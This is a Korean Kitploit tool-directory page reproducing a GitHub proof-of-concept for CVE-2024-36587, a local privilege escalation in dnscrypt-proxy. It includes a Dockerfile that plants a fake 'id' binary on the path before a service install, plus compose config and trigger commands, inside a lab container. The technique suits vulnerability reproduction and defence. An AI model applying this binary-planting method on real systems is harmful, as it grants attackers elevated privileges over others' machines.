Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-36587 — CVE-2024-36587에 대한 개념 증명 익스플로잇으로, 바이너리 플랜팅을 통해 dnscrypt-proxy에서 로컬 권한 상승을 시연하며, Docker 기반 재현 환경을 포함합니다. | Kitploit
도구/GitHubGitHub/meeeeing/cve-2024-36587
Privilege EscalationContainer SecurityVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

CVE-2024-36587에 대한 개념 증명 익스플로잇으로, 바이너리 플랜팅을 통해 dnscrypt-proxy에서 로컬 권한 상승을 시연하며, Docker 기반 재현 환경을 포함합니다.

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-36587 - dnscrypt-proxy Local Privilege Escalation

개요

  • 취약점 설명: dnscrypt-proxy 서비스 설치 시 현재 디렉토리의 실행 파일을 신뢰하여 등록하는 문제로 인해, 악성 바이너리를 삽입해 권한 상승이 가능하다.
  • 취약 버전: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • PoC 방법: 바이너리 플랜팅 (binary planting)

환경 구성

root@kitploit:~
docker compose up --build

빌드 및 실행이 완료되면 컨테이너가 생성된다.

컨테이너 내부로 접속:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

취약점 트리거

컨테이너 안에서:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Pwned_from_Docker가 출력되면 PoC 성공.

구성 파일

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

참고

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

실습 결과 스크린샷

docker build success

자세한 보고서

보다 자세한 분석 및 실습 결과는 다음 PDF 문서를 참고하면 된다:

PoC_Report_CVE-2024-36587.pdf

도구 다운로드